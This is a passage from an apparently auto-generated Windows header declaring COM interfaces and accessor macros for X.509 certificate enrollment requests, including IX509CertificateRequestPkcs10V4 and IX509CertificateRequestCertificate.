#define IX509CertificateRequestPkcs10V4_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10V4_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10V4_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10V4_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10V4_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestPkcs10V4_InitializeFromTemplate(This,context,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromTemplate(This,context,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKeyTemplate(This,Context,pPrivateKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V4_InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate)	\
    ( (This)->lpVtbl -> InitializeFromPublicKeyTemplate(This,Context,pPublicKey,pPolicyServer,pTemplate) ) 

#define IX509CertificateRequestPkcs10V4_get_PolicyServer(This,ppPolicyServer)	\
    ( (This)->lpVtbl -> get_PolicyServer(This,ppPolicyServer) ) 

#define IX509CertificateRequestPkcs10V4_get_Template(This,ppTemplate)	\
    ( (This)->lpVtbl -> get_Template(This,ppTemplate) ) 


#define IX509CertificateRequestPkcs10V4_get_AttestPrivateKey(This,pValue)	\
    ( (This)->lpVtbl -> get_AttestPrivateKey(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AttestPrivateKey(This,Value)	\
    ( (This)->lpVtbl -> put_AttestPrivateKey(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_AttestationEncryptionCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_AttestationEncryptionCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AttestationEncryptionCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_AttestationEncryptionCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_EncryptionAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_EncryptionAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10V4_put_EncryptionAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_EncryptionAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_get_EncryptionStrength(This,pValue)	\
    ( (This)->lpVtbl -> get_EncryptionStrength(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_EncryptionStrength(This,Value)	\
    ( (This)->lpVtbl -> put_EncryptionStrength(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_ChallengePassword(This,pValue)	\
    ( (This)->lpVtbl -> get_ChallengePassword(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ChallengePassword(This,Value)	\
    ( (This)->lpVtbl -> put_ChallengePassword(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_NameValuePairs(This,ppValue)	\
    ( (This)->lpVtbl -> get_NameValuePairs(This,ppValue) ) 


#define IX509CertificateRequestPkcs10V4_get_ClaimType(This,pValue)	\
    ( (This)->lpVtbl -> get_ClaimType(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_ClaimType(This,Value)	\
    ( (This)->lpVtbl -> put_ClaimType(This,Value) ) 

#define IX509CertificateRequestPkcs10V4_get_AttestPrivateKeyPreferred(This,pValue)	\
    ( (This)->lpVtbl -> get_AttestPrivateKeyPreferred(This,pValue) ) 

#define IX509CertificateRequestPkcs10V4_put_AttestPrivateKeyPreferred(This,Value)	\
    ( (This)->lpVtbl -> put_AttestPrivateKeyPreferred(This,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestPkcs10V4_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate_INTERFACE_DEFINED__
#define __IX509CertificateRequestCertificate_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCertificate */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCertificate;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab343-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCertificate : public IX509CertificateRequestPkcs10
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE CheckPublicKeySignature( 
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Issuer( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Issuer( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NotBefore( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NotBefore( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NotAfter( 
            /* [retval][out] */ __RPC__out DATE *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_NotAfter( 
            /* [in] */ DATE Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SerialNumber( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCertificateVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCertificate * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCertificate * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestCertificateVtbl;

    interface IX509CertificateRequestCertificate
    {
        CONST_VTBL struct IX509CertificateRequestCertificateVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCertificate_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCertificate_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCertificate_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCertificate_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCertificate_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCertificate_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCertificate_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCertificate_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCertificate_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCertificate_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCertificate_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCertificate_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCertificate_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCertificate_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCertificate_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_ClientId(This,Value)	\
